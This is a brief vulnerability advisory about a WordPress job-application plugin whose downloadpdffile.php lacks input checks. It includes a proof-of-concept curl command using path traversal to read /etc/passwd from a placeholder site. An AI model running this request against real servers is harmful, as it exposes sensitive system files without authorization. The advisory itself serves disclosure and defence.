Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd